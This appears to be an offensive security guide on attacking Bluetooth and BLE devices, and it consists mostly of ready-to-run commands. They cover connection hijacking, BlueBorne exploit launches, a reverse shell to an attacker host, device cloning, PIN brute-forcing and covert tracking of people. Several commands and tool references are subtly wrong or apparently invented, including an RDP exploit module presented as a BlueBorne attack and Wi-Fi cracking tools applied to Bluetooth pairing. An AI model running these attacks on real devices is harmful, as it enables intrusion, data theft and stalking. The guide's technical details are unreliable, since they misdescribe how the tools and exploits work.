Bluetooth & BLE Attacks

Exploitation

Comprehensive guide to exploiting Bluetooth Classic (BR/EDR) and Bluetooth Low Energy (BLE) protocols, including MITM attacks, device tracking, impersonation, and firmware exploitation.

Information

Guide Navigation: This comprehensive guide covers multiple Bluetooth attack vectors. Use the table of contents below to jump to specific topics.

๐Ÿ“‘ Table of Contents

๐Ÿ”ต Bluetooth Architecture Overview

Bluetooth is a short-range wireless technology operating in the 2.4 GHz ISM band, designed for device-to-device communication. There are two main variants: Bluetooth Classic (BR/EDR - Basic Rate/Enhanced Data Rate) used for audio streaming and file transfer, and Bluetooth Low Energy (BLE) designed for IoT devices with minimal power consumption.

Understanding the architecture is critical for exploitation. Classic Bluetooth uses frequency hopping across 79 channels to avoid interference, while BLE uses only 40 channels with 3 dedicated advertising channels. BLE's simplified connection process and reduced overhead make it ideal for battery-powered devices but also introduce unique attack vectors through its GATT (Generic Attribute Profile) services.

Bluetooth Classic vs BLE

๐Ÿ“ป Bluetooth Classic (BR/EDR)

  • Frequency: 2.4 GHz ISM band
  • Channels: 79 channels (1 MHz each)
  • Range: ~100m (Class 1), ~10m (Class 2)
  • Speed: Up to 3 Mbps
  • Power: Higher consumption
  • Use cases: Audio, file transfer, serial

โšก Bluetooth Low Energy (BLE)

  • Frequency: 2.4 GHz ISM band
  • Channels: 40 channels (2 MHz each)
    • 3 advertising channels (37, 38, 39)
    • 37 data channels (0-36)
  • Range: ~50m typical
  • Speed: 1-2 Mbps
  • Power: Ultra-low consumption
  • Use cases: IoT, wearables, beacons

BLE Security Mechanisms

๐Ÿ” Pairing Methods

  1. Just Works: No PIN (vulnerable to MITM)
  2. Passkey Entry: 6-digit PIN
  3. Numeric Comparison: Display + confirm
  4. Out of Band (OOB): NFC/QR code

๐Ÿ”’ Encryption

  • AES-CCM 128-bit
  • Link layer encryption
  • Application layer: depends on GATT service

๐Ÿ› ๏ธ Reconnaissance & Discovery

Bluetooth reconnaissance is the first step in any attack. Unlike WiFi where you scan for access points, Bluetooth requires discovering individual devices. Classic Bluetooth uses inquiry scanning (devices respond to inquiry requests), while BLE uses passive scanning of advertising packets. Each method has different detection characteristics and stealth implications.

1. Device Discovery

Device discovery reveals nearby Bluetooth devices, their MAC addresses, device names, and often device type (phone, headset, etc.). For Classic Bluetooth, this is an active processโ€”your scan sends inquiry packets that devices respond to. For BLE, you passively listen for advertising packets broadcast by peripherals seeking connections. Modern devices often use MAC address randomization to prevent tracking, changing their address periodically.

bash 
# Classic Bluetooth Scan
hcitool scan
sdptool browse <MAC>

# BLE Scan
sudo hcitool lescan
sudo timeout 10 hcitool lescan --duplicates

# btscanner (GUI)
sudo btscanner

# Bettercap BLE Discovery
sudo bettercap -eval "ble.recon on; sleep 30; ble.show"

# Ubertooth (passive sniffing)
ubertooth-btle -f -c advertising.pcap

2. Service Enumeration

bash 
# GATT Service Discovery
gatttool -b <MAC> --primary
gatttool -b <MAC> --characteristics

# Read all characteristics
gatttool -b <MAC> -I
[<MAC>][LE]> connect
[<MAC>][LE]> primary
[<MAC>][LE]> characteristics
[<MAC>][LE]> char-read-hnd 0x0003

# Bettercap GATT Enum
sudo bettercap
>> ble.recon on
>> ble.enum <MAC>

3. Device Fingerprinting

bash 
# Identify device type/manufacturer
bluetoothctl
[bluetooth]# scan on
[bluetooth]# info <MAC>

# OUI Lookup
curl -s "https://api.macvendors.com/<MAC>"

# Advertising data analysis
sudo hcitool lescan --duplicates | grep <MAC>
sudo btmon  # Monitor HCI traffic

๐ŸŽฏ BLE MITM Attacks

Man-in-the-Middle attacks on BLE are particularly powerful because they allow real-time interception and modification of data between two devices. Unlike WiFi MITM which requires being on the same network, BLE MITM involves sniffing the connection establishment (pairing) to extract encryption keys, then using those keys to decrypt all subsequent traffic. This requires specialized hardware like micro:bit or nRF51822 boards.

The challenge: BLE uses frequency hopping with connection-specific hop sequences derived during pairing. To perform MITM, you must capture the initial connection parameters (access address, hop interval, channel map) during the pairing handshake. Once you have these and the encryption keys (if "Just Works" pairing is used, keys are weak), you can follow the connection and inject/modify packets in real-time.

1. Btlejack - BLE MITM Framework

Btlejack is the de facto tool for BLE security testing. It uses inexpensive micro:bit boards (ยฃ15 each) as sniffers and injectors. You need multiple boards to cover the 37 BLE data channels simultaneously. Btlejack can sniff existing connections (if you catch the connection establishment), jam connections to force reconnection, and inject arbitrary packets into active connections.

bash 
# Install (requires micro:bit or nRF51822)
pip3 install btlejack

# Sniff connections
sudo btlejack -s

# Follow connection (after sniffing pairing)
sudo btlejack -f <ACCESS_ADDRESS> -c

# Jam and inject
sudo btlejack -j <ACCESS_ADDRESS>
sudo btlejack -m -c <CONNECTION_DATA>

# Export to PCAP
sudo btlejack -f <ACCESS_ADDRESS> -c -o capture.pcap

Warning

Hardware Required: Btlejack requires BBC micro:bit (v1/v2) or nRF51822 development boards. Standard Bluetooth adapters cannot perform active MITM on BLE.

2. BLE Replay Attacks

bash 
# Capture BLE traffic with Ubertooth
ubertooth-btle -f -c capture.pcap

# Analyze with Wireshark
wireshark capture.pcap

# Extract write commands
tshark -r capture.pcap -Y "btatt.opcode == 0x12" \
  -T fields -e btatt.handle -e btatt.value

# Replay write with gatttool
gatttool -b <MAC> --char-write-req -a <HANDLE> -n <VALUE>

3. GATTacker Framework

bash 
# Clone and setup
git clone https://github.com/securing/gattacker
cd gattacker
./install_dependencies.sh

# Scan target device
python3 gattacker.py -s -t <MAC>

# Create spoofed device
python3 gattacker.py -m <MAC> -i hci0 -r relay

# MITM mode (relay between real device and app)
python3 gattacker.py -m <TARGET_MAC> -c <CLIENT_MAC> -i hci0

๐Ÿ’‰ BlueBorne Exploitation

BlueBorne (CVE-2017-0785 and related) is a collection of vulnerabilities in Bluetooth stacks that allow remote code execution without any user interaction. The critical aspect: devices don't need to be paired or even in discoverable mode. If Bluetooth is enabled, they're vulnerable. BlueBorne affects billions of devices across Linux, Android, Windows, and iOS.

The vulnerabilities exploit memory corruption bugs in how Bluetooth stacks parse connection requests and protocol data. An attacker sends specially crafted Bluetooth packets (L2CAP, SDP, BNEP protocols) that trigger buffer overflows or information leaks. Successful exploitation grants full system accessโ€”the attacker can install malware, exfiltrate data, or pivot to other network devices. While patches were released in 2017, many IoT and embedded devices remain vulnerable.

Danger

CVE-2017-0785 (BlueBorne): Remote code execution vulnerabilities affecting Linux, Android, Windows, and iOS Bluetooth stacks. Requires Bluetooth enabled but NOT paired.

BlueBorne Attack Vector

bash 
# Check for BlueBorne vulnerability
git clone https://github.com/ArmisSecurity/blueborne
cd blueborne

# Linux exploit (CVE-2017-1000251)
python3 linux-bluez/bluez_poc.py <TARGET_MAC>

# Android exploit (CVE-2017-0785)
python3 android/exploit.py <TARGET_MAC>

# Windows exploit (CVE-2017-8628)
python3 windows/exploit.py <TARGET_MAC>

# Metasploit module
use exploit/multi/misc/bluekeep_rce
set RHOSTS <TARGET_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

Post-Exploitation

bash 
# Once RCE achieved via BlueBorne
# Establish reverse shell
nc -lvnp 4444

# From exploit
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

# Persistence via Bluetooth
# Add malicious service to /etc/bluetooth/rfcomm.conf

๐ŸŽญ Device Impersonation & Spoofing

Bluetooth device impersonation involves cloning or spoofing a legitimate device to trick victims into connecting. This is effective against devices with saved/trusted pairingsโ€”users expect their headphones or smartwatch to connect automatically. By spoofing the MAC address and device name of a trusted device, you can intercept connections meant for the legitimate device.

1. MAC Address Spoofing

bash 
# Spoof Bluetooth MAC
sudo bdaddr -i hci0 <TARGET_MAC>

# Verify
hciconfig hci0

# Alternative method
sudo systemctl stop bluetooth
sudo btmgmt -i hci0 public-addr <TARGET_MAC>
sudo systemctl start bluetooth

2. BLE Device Cloning

bash 
# Use bluer to clone BLE peripheral
pip3 install bluer

# Scan and save profile
bluer-scan -t 10 > devices.json

# Clone specific device
bluer-clone --mac <TARGET_MAC> --output clone_profile.json

# Advertise as cloned device
sudo python3 ble_advertise.py --profile clone_profile.json

3. BLE Beacon Spoofing

bash 
# iBeacon spoofing
sudo hciconfig hci0 up
sudo hciconfig hci0 leadv 3
sudo hciconfig hci0 noscan

# Set advertising data (iBeacon format)
sudo hcitool -i hci0 cmd 0x08 0x0008 \
  1E 02 01 1A 1A FF 4C 00 02 15 \
  <UUID 16 bytes> \
  <MAJOR 2 bytes> <MINOR 2 bytes> <TX_POWER 1 byte>

# Start advertising
sudo hciconfig hci0 leadv 0

# Stop
sudo hciconfig hci0 noleadv

๐Ÿ“ Bluetooth Tracking & Privacy

Bluetooth tracking exploits the fact that most devices constantly broadcast their presence. Even with MAC randomization, devices can often be tracked through timing patterns, advertising data, and manufacturer-specific information. This enables surveillance applications like retail analytics ("How long did customers spend in this aisle?"), stalking, or building occupancy tracking.

1. Device Tracking

bash 
# Track devices by MAC
while true; do
  sudo hcitool lescan --duplicates | grep -i <PARTIAL_MAC>
  sleep 2
done

# RSSI-based distance estimation
sudo hcitool rssi <MAC>

# Continuous monitoring with timestamps
sudo btmon | tee bluetooth_tracking.log

# Parse and analyze
cat bluetooth_tracking.log | grep -E "(MAC|RSSI)" > tracked_devices.txt

2. BLE Tracking with Kismet

bash 
# Install Kismet with Bluetooth support
sudo apt install kismet

# Configure for BLE
sudo kismet -c hci0:type=linuxbluetooth

# Access web interface
# http://localhost:2501

# Export devices
kismetdb_dump_devices --in ~/kismet/Kismet-*.kismet --out devices.json

3. MAC Randomization Detection

bash 
# Many modern devices use MAC randomization
# Detect patterns in random MACs

# Check for static vs random MAC
# Random MACs: bit 1 of first octet = 1
# Example: DA:XX:XX:XX:XX:XX (random)
#          00:XX:XX:XX:XX:XX (static)

# Fingerprint by advertising data
sudo btmon | grep -A 10 "Company"

# Correlate with manufacturer data
# Even with random MAC, UUIDs may be static

๐Ÿ”“ PIN/Pairing Attacks

Bluetooth pairing establishes a trusted relationship between devices using various authentication methods. The weakest method is "Just Works" which has no MITM protectionโ€”devices pair without any verification. Other methods like PIN entry (6-digit code) and numeric comparison are stronger but still vulnerable to brute force or social engineering. Once paired, devices store link keys for future authentication.

1. Classic Bluetooth PIN Cracking

bash 
# Capture pairing with Ubertooth
ubertooth-btle -f -c pairing.pcap

# Extract pairing data
tshark -r pairing.pcap -Y "bluetooth.smp.cmd_code"

# Crunch PIN wordlist (6 digits)
crunch 6 6 0123456789 | aircrack-ng -w - pairing.cap

# Brute force with bluer
python3 bt_pin_brute.py --mac <MAC> --start 000000 --end 999999

2. BLE Just Works MITM

bash 
# "Just Works" pairing has no MITM protection
# Exploit with btlejack

# Sniff connection
sudo btlejack -s

# Detected: AA:BB:CC:DD:EE:FF 
# Follow and decrypt (if Just Works used)
sudo btlejack -f 0x12345678 -c -m

# All traffic will be decrypted in real-time

๐Ÿ”ง Advanced Tools

Bettercap - All-in-one

bash 
# Install
sudo apt install bettercap

# BLE module
sudo bettercap
>> ble.recon on
>> ble.show
>> ble.enum <MAC>
>> ble.write <MAC> <HANDLE> <HEX_VALUE>

# Scripts
>> ble.recon on; sleep 30; ble.show; ble.recon off

Ubertooth One

bash 
# Firmware update
ubertooth-dfu --download

# Spectrum analysis
ubertooth-specan-ui

# Follow Bluetooth connection
ubertooth-follow -l -t <MAC>

# Passive BLE sniffing
ubertooth-btle -f -c output.pcap

# Active jamming
ubertooth-btle -j

BlueZ Utils

bash 
# bluetoothctl - interactive shell
sudo bluetoothctl
[bluetooth]# scan on
[bluetooth]# pair <MAC>
[bluetooth]# connect <MAC>
[bluetooth]# info <MAC>

# l2ping - connectivity test
sudo l2ping <MAC>

# rfcomm - serial connection
sudo rfcomm bind 0 <MAC> 1
sudo rfcomm connect 0 <MAC>

๐Ÿงช Testing Verification

BLE Security Assessment Checklist

๐Ÿ” Authentication

  • โ˜ Just Works pairing used (high risk)
  • โ˜ Passkey/PIN required
  • โ˜ Numeric comparison implemented
  • โ˜ OOB pairing available

๐Ÿ•ต๏ธ Privacy Checks

  • โ˜ MAC address randomization enabled
  • โ˜ No static identifiers in advertising
  • โ˜ Manufacturer data doesn't leak info

๐Ÿ”ง Firmware Security

  • โ˜ OTA updates signed and verified
  • โ˜ Debug interfaces disabled
  • โ˜ BlueBorne patched (CVE-2017-0785)
  • โ˜ KNOB vulnerability patched (CVE-2019-9506)

Automated Testing

bash 
# BLE security scanner
git clone https://github.com/securing/blescanner
python3 blescanner.py -t <MAC>

# Output shows:
# - Pairing method
# - Encryption status
# - GATT service permissions
# - Known vulnerabilities

# Report format
python3 blescanner.py -t <MAC> -o json > ble_report.json

๐Ÿ›ก๏ธ Defense & Detection

Detecting BLE Attacks

bash 
# Monitor for suspicious BLE activity
# 1. Unexpected devices advertising
sudo hcitool lescan | grep -v "known_devices.txt"

# 2. Connection attempts
sudo btmon | grep -i "connection"

# 3. RSSI anomalies (MITM device closer)
while true; do
  sudo hcitool rssi <KNOWN_MAC>
  sleep 5
done

# 4. Duplicate advertising (spoofing)
sudo btmon | grep -A 5 "Advertising" | grep "Address"

Hardening Bluetooth

bash 
# Disable when not needed
sudo systemctl stop bluetooth
sudo systemctl disable bluetooth

# Set non-discoverable
hciconfig hci0 noscan

# Require authentication for services
# Edit /etc/bluetooth/main.conf
[Policy]
AutoEnable=false
 
# Pair only with known devices
# Use bluetoothctl to whitelist

# Monitor with auditd
sudo auditctl -w /var/lib/bluetooth -p wa -k bluetooth_changes

๐Ÿ“š Key Takeaways

Information

  • BLE โ‰  Secure: "Just Works" pairing provides no MITM protection
  • Hardware Matters: Ubertooth/micro:bit required for active attacks
  • BlueBorne: Check patch status on all Bluetooth devices (CVE-2017-0785)
  • Privacy: MAC randomization helps but isn't foolproof
  • Physical Proximity: Bluetooth attacks require close range (~10-100m)

Related Topics

Wireless Pentesting

IoT Security

Physical Security